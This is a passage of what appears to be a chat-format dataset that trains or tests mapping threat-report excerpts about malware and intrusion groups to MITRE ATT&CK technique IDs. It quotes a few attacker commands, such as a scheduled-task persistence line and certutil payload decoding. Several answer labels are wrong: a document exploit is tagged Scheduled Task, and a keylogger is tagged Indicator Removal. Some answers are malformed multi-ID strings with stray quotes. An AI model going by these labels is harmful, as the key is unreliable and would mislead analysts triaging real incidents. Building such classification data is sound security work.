named either “modules” or “data,” and modified the following registry value" }, { "role": "assistant", "content": "T1112 - Modify Registry" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "This turned out to be the best solution, as the Cobalt group set up a controlled botnet in the bank's network which was very difficult to track and even harder to stop. In october 2016 Group-IB published the report about the Cobalt group. Network penetration In all cases investigated by Group-IB, the Cobalt group used a set of spear phishing emails to gain initial access to the corporate infrastructure. For organizations that perform timely updates of their systems and adhere to strict security policies, the Cobalt group employs another method to deliver malicious code through emails with Word documents containing a malicious macro. Provision of the malware survivability The Cobalt group uses different methods to ensure malware survivability on corporate networks. Aside from that, startup is performed by loading Cobalt Strike into the main memory without saving to the file system. Bypassing network security Cobalt Strike allows users to install two types of modules: HTTP/HTTPS/DNS modules and SMB modules. Use of standard tools Cobalt Strike is publicly accessible, and can be downloaded in order to learn and create detection rules on the network. To prevent this threat, the company should configure filter rules to detect the above-mentioned tools on the corporate network. Conclusion After infecting one computer on an organization's network, the Cobalt group analyzes the programs used on it and search for critical servers and the computers from which they are accessed" }, { "role": "assistant", "content": "T1046 - Network Service Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "RATANKBA uses WMI to perform process monitoring." }, { "role": "assistant", "content": "T1047 - Windows Management Instrumentation" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The file /tmp/.rOuYXzdOF was most likely used as a mutex, ensuring only one copy of Netwire could run at a time. Next, .default.conf was a configuration file storing data required for Netwire to communicate with command and control. On the Windows side, this is usually stored in the Registry" }, { "role": "assistant", "content": "T1112 - Modify Registry" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "can be used to discover local NetBIOS domain names." }, { "role": "assistant", "content": "T1016 - System Network Configuration Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "After uploading these files, take advantage of the pre-built queries within BloodHound. Queries include: viewing all domain administrators; viewing users with the most local administrator rights; or viewing computers with the most administrative user access. One of these queries gives you the ability to map domain trusts, as shown in Figure 3" }, { "role": "assistant", "content": "T1482 - Domain Trust Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "During Operation Wocao, threat actors used a Visual Basic script that checked for internet connectivity." }, { "role": "assistant", "content": "T1016.001 - System Network Configuration Discovery: Internet Connection Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "REvil has infected victim machines through compromised websites and exploit kits." }, { "role": "assistant", "content": "T1189 - Drive-by Compromise" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "At the same time, Enc.exe will start the encryption routine and append “. jcry ” as file extension to the encrypted file." }, { "role": "assistant", "content": "T1486 - Data Encrypted for Impact" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "For both the receiving of C2 commands and exfiltration, Remexi uses the Microsoft Background Intelligent Transfer Service (BITS) mechanism to communicate with the C2 over HTTP" }, { "role": "assistant", "content": "T1071.001 - Application Layer Protocol: Web Protocols', 'T1041 - Exfiltration Over C2 Channel', 'T1071 - Application Layer Protocol', 'T1132 - Data Encoding" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "KEYMARBLE can execute shell commands using cmd.exe." }, { "role": "assistant", "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Attor's Blowfish key is encrypted with a public RSA key." }, { "role": "assistant", "content": "T1573.002 - Asymmetric Cryptography" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "WarzoneRAT can obtain a list of processes on a compromised host." }, { "role": "assistant", "content": "T1057 - Process Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Clambling can inject into the `svchost.exe` process for execution." }, { "role": "assistant", "content": "T1055 - Process Injection" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "has used powershell.exe to download and execute scripts." }, { "role": "assistant", "content": "T1059.001 - Command and Scripting Interpreter: PowerShell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Carbanak’s Harpy backdoor malware can use DNS as a backup channel for C2 if HTTP fails." }, { "role": "assistant", "content": "T1008 - Fallback Channels" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "ShimRat can list directories." }, { "role": "assistant", "content": "T1083 - File and Directory Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Many Misdat samples were programmed using Borland Delphi, which will mangle the default PE compile timestamp of a file." }, { "role": "assistant", "content": "T1070.006 - Indicator Removal on Host: Timestomp" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Wizard Spider has used \"ipconfig\" to identify the network configuration of a victim machine." }, { "role": "assistant", "content": "T1016 - System Network Configuration Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The files we recovered indicate they do it by executing a script file, which uses the Sysinternals psexec tool to move laterally by trying to copy it to every machine they can reach:" }, { "role": "assistant", "content": "T1569.002 - System Services: Service Execution" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "WarzoneRAT has the capability to grab passwords from numerous web browsers as well as from Outlook and Thunderbird email clients." }, { "role": "assistant", "content": "T1555.003 - Credentials from Password Stores: Credentials from Web Browsers" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The macro prepends the string -----BEGIN CERTIFICATE----- to the beginning of the base64 encoded payload and appends -----END CERTIFICATE----- to the end of the data. The macro then writes this data to a text file in the C:\\Programdata folder using a random filename with the .txt extension. The macro then uses the command certutil -decode to decode the contents of this text file and outputs the decoded content to a randomly named file with a .exe extension in the C:\\Programdata folder. The newly dropped executable is a loader Trojan responsible for installing and running the payload of this attack. Overall, SofacyCarberp does initial reconnaissance by gathering system information and sending it to the C2 server prior to downloading additional tools to the system. These differences include a new hashing algorithm to resolve API functions and to find running browser processes for injection, as well as changes to the C2 communication mechanisms as explained in detail within the appendix. Open-source Delivery Document Generator It appears that Sofacy may have used an open-source tool called Luckystrike to generate the delivery document and/or the macro used in this attack. Luckystrike, which was presented at DerbyCon 6 in September 2016, is a Microsoft PowerShell-based tool that generates malicious delivery documents by allowing a user to add a macro to an Excel or Word document to execute an embedded payload. To confirm our suspicions, we generated a malicious Excel file with Luckystrike and compared its macro to the macro found within Sofacy's delivery document. We found that there was only one difference between the macros besides the random function name and random cell values that the Luckystrike tool generates for each created payload" }, { "role": "assistant", "content": "T1105 - Ingress Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "has used via Web shell to establish redundant access. The group has also used harvested credentials to gain access to Internet-accessible resources such as Outlook Web Access, which could be used for redundant access." }, { "role": "assistant", "content": "T1108 - Redundant Access" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Astaroth checks for the presence of Avast antivirus in the \"C:\\Program\\Files\\\" folder." }, { "role": "assistant", "content": "T1518.001 - Software Discovery: Security Software Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The GetWebpImage() method is in charge of masquerading the output of the C2 commands as a legitimate WebP file (by adding appropriate RIFF/WebP file header magic/fields) and encoding the resulting WebP file" }, { "role": "assistant", "content": "T1036 - Masquerading" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "QakBot can identify peripheral devices on targeted systems." }, { "role": "assistant", "content": "T1120 - Peripheral Device Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "More_eggs can download and launch additional payloads." }, { "role": "assistant", "content": "T1105 - Ingress Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Kazuar uploads files from a specified directory to the C2 server." }, { "role": "assistant", "content": "T1005 - Data from Local System" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Astaroth uses certutil and BITSAdmin to download additional malware." }, { "role": "assistant", "content": "T1105 - Ingress Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Command Number – a running index number to keep track of executed commands. If set to any number other than -1, the backdoor should proceed to execute the command, according to the Command ID. Command ID – can be one of the following commands: 101 – Shell Command: execute the Shell command attached in the {Arg1} argument. 102 – Download File: Downloads a file that can be found on the {Arg2} path on the server, and saves it on the disk with the {Arg1} name. 104 – Shell Command (duplicate): execute the Shell command attached in the {Arg1} argument. 101 – Shell Command: execute the Shell command attached in the {Arg1} argument. 102 – Download File: Downloads a file that can be found on the {Arg2} path on the server, and saves it on the disk with the {Arg1} name. 104 – Shell Command (duplicate): execute the Shell command attached in the {Arg1} argument" }, { "role": "assistant", "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "uses cmd.exe and /bin/bash to execute commands on the victim’s machine." }, { "role": "assistant", "content": "T1059 - Command and Scripting Interpreter" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "WMI can be accessed using a variety of tools, including the Windows WMI Command-line (wmic.exe), or through APIs accessible to programming and scripting languages such as PowerShell" }, { "role": "assistant", "content": "T1047 - Windows Management Instrumentation" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The script self-scheduling, as well as the scheduling of a script that repeatedly attempts to download and execute the Revenge RAT binary, significantly contribute to the persistence of this infection" }, { "role": "assistant", "content": "T1105 - Ingress Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Windows AppLocker allows administrators to control which executable files are denied or authorized to execute. AppLocker works well for executables and over time it has also been improved to control various script types, including JScript, PowerShell and VBScript. This has significantly reduced the attack surface and forced attackers, including more sophisticated groups, to find new methods of launching executable code. A number of legitimate Windows executables that are not blocked by the default AppLocker policies has been discovered and various proof of concept AppLocker bypass code became publicly available. Example of malicious scriptlet file used to drop a malicious DLL dropper for the next stage Microsoft allows developers to create COM+ objects in script code stored in an XML document, a so-called scriptlet file. To bypass AppLocker and launching script code within a scriptlet, the attacker includes the malicious code within an XML script tag placed within the registration tag of the scriptlet file and calls cmstp with appropriate parameters. For example: Here, the attackers randomize the scriptlet name and use a .txt filename extension, likely in an attempt to bypass fundamental protection mechanisms that attempt to block file types based on the filename extension. Payload dropper in an XSL file Another executable used to attempt bypass of the AppLocker feature is msxsl.exe, a Windows utility used to run XSL (eXtensible Stylesheet Language) transformations. It takes an XML and an XSL file as a parameter, but it also loads the script engine and runs the script code within the <msxsl:script> tag of the supplied XSL file when invoked through a call placed within the <xsl:value-of> tag. Invoking the JScript code of the payload dropper within an XSL file The supplied XML file seems to be randomly generated and used simply because the second parameter is required and is of no further interest for analysis" }, { "role": "assistant", "content": "T1220 - XSL Script Processing" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "ZeroT has obfuscated DLLs and functions using dummy API calls inserted between real instructions." }, { "role": "assistant", "content": "T1027.001 - Obfuscated Files or Information: Binary Padding" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "This script is meant to delete the Pony Loader after execution (works in a loop, in order to wait for the sample to terminate). The same can be found in Pony 1.9 code" }, { "role": "assistant", "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell', 'T1070.004 - Indicator Removal on Host: File Deletion" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Finally, the Trojan creates a scheduled task to run itself every three minutes by running the following command on the command prompt after replacing the %path% string with the path to the srvResesponded.vbs VBScript:SchTasks /Create /SC MINUTE /MO 3 /TN “InetlSecurityAssistManager” /TR “wscript %path%” /f The Trojan uses HTTP to communicate with its C2 server, specifically using the InternetExplorer application object within an embedded Microsoft .NET Framework assembly called Interop.SHDocVw" }, { "role": "assistant", "content": "T1071 - Application Layer Protocol', 'T1053.005 - Scheduled Task/Job: Scheduled Task" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The purpose of the bytecode is to decrypt the embedded payload, load it into memory reflectively and execute it" }, { "role": "assistant", "content": "T1140 - Deobfuscate/Decode Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Empire can use \"New-GPOImmediateTask\" to modify a GPO that will install and execute a malicious Scheduled Task/Job." }, { "role": "assistant", "content": "T1484.001 - Domain Policy Modification: Group Policy Modification" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Rocke installed a cron job that downloaded and executed files from the C2." }, { "role": "assistant", "content": "T1053.003 - Scheduled Task/Job: Cron" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "can be used to find information about the operating system." }, { "role": "assistant", "content": "T1082 - System Information Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Empire can acquire local and domain user account information." }, { "role": "assistant", "content": "T1087.001 - Account Discovery: Local Account', 'T1087.002 - Account Discovery: Domain Account" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Ke3chang has dropped their malware into legitimate installed software paths including: `C:\\ProgramFiles\\Realtek\\Audio\\HDA\\AERTSr.exe`, `C:\\Program Files (x86)\\Foxit Software\\Foxit Reader\\FoxitRdr64.exe`, `C:\\Program Files (x86)\\Adobe\\Flash Player\\AddIns\\airappinstaller\\airappinstall.exe`, and `C:\\Program Files (x86)\\Adobe\\Acrobat Reader DC\\Reader\\AcroRd64.exe`." }, { "role": "assistant", "content": "T1036.005 - Masquerading: Match Legitimate Name or Location" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "After the Waterbear DLL loader is executed, it searches for a hardcoded path and tries to decrypt the corresponding payload, which is a piece of encrypted shellcode. If the decrypted payload is valid, it picks a specific existing Windows Service — LanmanServer, which is run by svchost.exe — and injects the decrypted shellcode into the legitimate service" }, { "role": "assistant", "content": "T1055 - Process Injection" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Any other command that doesn’t fit the above patterns will be forwarded and processed as an argument to ‘cmd.exe /c’ and run via the ‘ShellExecuteW’ API. Additionally, each beacon is accompanied with a screenshot that is initially saved as ‘scr.jpg’ in the public directory and subsequently issued to the C2 using the same HTTP POST request as in the ‘uploadsf’ command" }, { "role": "assistant", "content": "T1106 - Native API" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "registers itself as a service on the victim’s machine to run as a standalone process." }, { "role": "assistant", "content": "T1569.002 - System Services: Service Execution" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Mustang Panda has leveraged the legitimate email marketing service SMTP2Go for phishing campaigns." }, { "role": "assistant", "content": "T1585.002 - Email Accounts" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "APT15 then used a tool known as RemoteExec (similar to Microsoft’s Psexec) in order to remotely execute batch scripts and binaries" }, { "role": "assistant", "content": "T1569.002 - System Services: Service Execution" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Okrum can collect the victim username." }, { "role": "assistant", "content": "T1033 - System Owner/User Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Kwampirs collects a list of domain groups with the command \"net localgroup /domain\"." }, { "role": "assistant", "content": "T1069.002 - Permission Groups Discovery: Domain Groups" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Commands such as \"net group /domain\" can be used in Net to gather information about and manipulate groups." }, { "role": "assistant", "content": "T1069.002 - Permission Groups Discovery: Domain Groups" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "APT19 performed a watering hole attack on forbes.com in 2014 to compromise targets." }, { "role": "assistant", "content": "T1189 - Drive-by Compromise" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "After gaining an initial foothold on a compromised system, the NICKEL actors routinely performed reconnaissance on the network, working to gain access to additional accounts or higher-value systems. NICKEL typically deployed a keylogger to capture credentials from users on compromised systems" }, { "role": "assistant", "content": "T1070 - Indicator Removal on Host', 'T1114.002 - Email Collection: Remote Email Collection" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "has performed credential dumping with and Lazagne." }, { "role": "assistant", "content": "T1003 - OS Credential Dumping" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Agent Tesla can steal data from the victim’s clipboard." }, { "role": "assistant", "content": "T1115 - Clipboard Data" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "collects the victim’s username and whether that user is an admin." }, { "role": "assistant", "content": "T1033 - System Owner/User Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "HAWKBALL has leveraged several Windows API calls to create processes, gather disk information, and detect debugger activity." }, { "role": "assistant", "content": "T1106 - Native API" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "loads malicious shellcode and executes it in memory." }, { "role": "assistant", "content": "T1064 - Scripting" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Let’s look at an example. During our investigation of an infection at a computer game company, we found that malware had been created for a particular service on the company’s server. The malicious program was looking for a specific process running on the server, injected code into it, and then sought out two places in the process code where it could conceal call commands for its function interceptors. Using these function interceptors, the malicious programs modified process data which was processed in those two places, and returned control back. Thus, the attackers change the normal execution of the server processes. Unfortunately, the company was not able to share its targeted application with us, and we cannot say exactly how this malicious interference affected gaming processes" }, { "role": "assistant", "content": "T1057 - Process Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "SombRAT has the ability to use an embedded SOCKS proxy in C2 communications." }, { "role": "assistant", "content": "T1090 - Proxy" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "CTU analysis of one of GOLD KINGSWOOD's campaign using SpicyOmelette (DOC2018.js) exposed additional sophisticated methods to compromise targets. A valid digital certificate was used to sign the malicious script. Windows Scripting Host supports the inclusion of digital signatures, and Figure 2 shows how the signature was appended to the script" }, { "role": "assistant", "content": "T1553.002 - Code Signing" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Kimsuky has used Twitter to monitor potential victims and to prepare targeted phishing e-mails." }, { "role": "assistant", "content": "T1593.001 - Social Media" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "obfuscates some commands by using statically programmed fragments of strings when starting a DLL. It also uses a one-byte xor against 0x91 to encode configuration data." }, { "role": "assistant", "content": "T1027 - Obfuscated Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "hcdLoader installs itself as a service for persistence." }, { "role": "assistant", "content": "T1543.003 - Create or Modify System Process: Windows Service" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "While PotPlayerDB.dat is a variant of PlugX malware, TA416 has updated the payload by changing both its encoding method and expanding the payload’s configuration capabilities. Historically, TA416 relied on the DLL launcher to decode the PlugX payload utilizing an XOR key included at the offset 0 within the PlugX DAT configuration file. One of the main ways it does this is by resolving API functions during runtime. Generally, malware loads a DLL, iterates over the set of exports of the DLL and hashes the string, looking for a matching hash. This iteration of PlugX does standard API hashing, but only to resolve the address of the functions GetProcAddress as well as LoadLibrary. Once those functions are resolved properly, it loads the rest of the functions via their text name" }, { "role": "assistant", "content": "T1027 - Obfuscated Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Okrum was seen using a keylogger tool to capture keystrokes." }, { "role": "assistant", "content": "T1056.001 - Input Capture: Keylogging" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "njRAT is capable of manipulating and deleting registry keys." }, { "role": "assistant", "content": "T1070 - Indicator Removal on Host" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Of the tools listed above, many were obfuscated with VMProtect (v1.60-2.05), a recurring theme with BackdoorDiplomacy tools" }, { "role": "assistant", "content": "T1027 - Obfuscated Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "has inserted garbage characters into code, presumably to avoid anti-virus detection." }, { "role": "assistant", "content": "T1027.001 - Obfuscated Files or Information: Binary Padding" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Talos has identified two different infection vectors associated with this particular campaign. The first vector relies on a trojanized document that fetches a remote template and then uses a known exploit. In the first scenario, Talos discovered a document named \"MinutesofMeeting-2May19.docx\", that appeared to display the national flag of Jordan. Once the luncher.doc was downloaded, it used CVE-2017-11882, to execute code on the victim's machine" }, { "role": "assistant", "content": "T1053.005 - Scheduled Task/Job: Scheduled Task" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Shamoon attempts to overwrite operating system files and disk structures with image files. In a later variant, randomly generated data was used for data overwrites." }, { "role": "assistant", "content": "T1485 - Data Destruction" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Zebrocy has a command to create a scheduled task for persistence." }, { "role": "assistant", "content": "T1053.005 - Scheduled Task/Job: Scheduled Task" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "And, of course, the attackers added the ability to control the infected machine. The code receives a binary blob official M.E.Doc server, decrypts it using the Triple DES algorithm, and, afterwards, decompresses it using GZip. The result is an XML file that could contain several commands at once. This remote control feature makes the backdoor a fully-featured cyberespionage and cybersabotage platform at the same time" }, { "role": "assistant", "content": "T1070.004 - Indicator Removal on Host: File Deletion" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "During Frankenstein, the threat actors used Word documents that prompted the victim to enable macros and run a Visual Basic script." }, { "role": "assistant", "content": "T1059.005 - Command and Scripting Interpreter: Visual Basic" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate 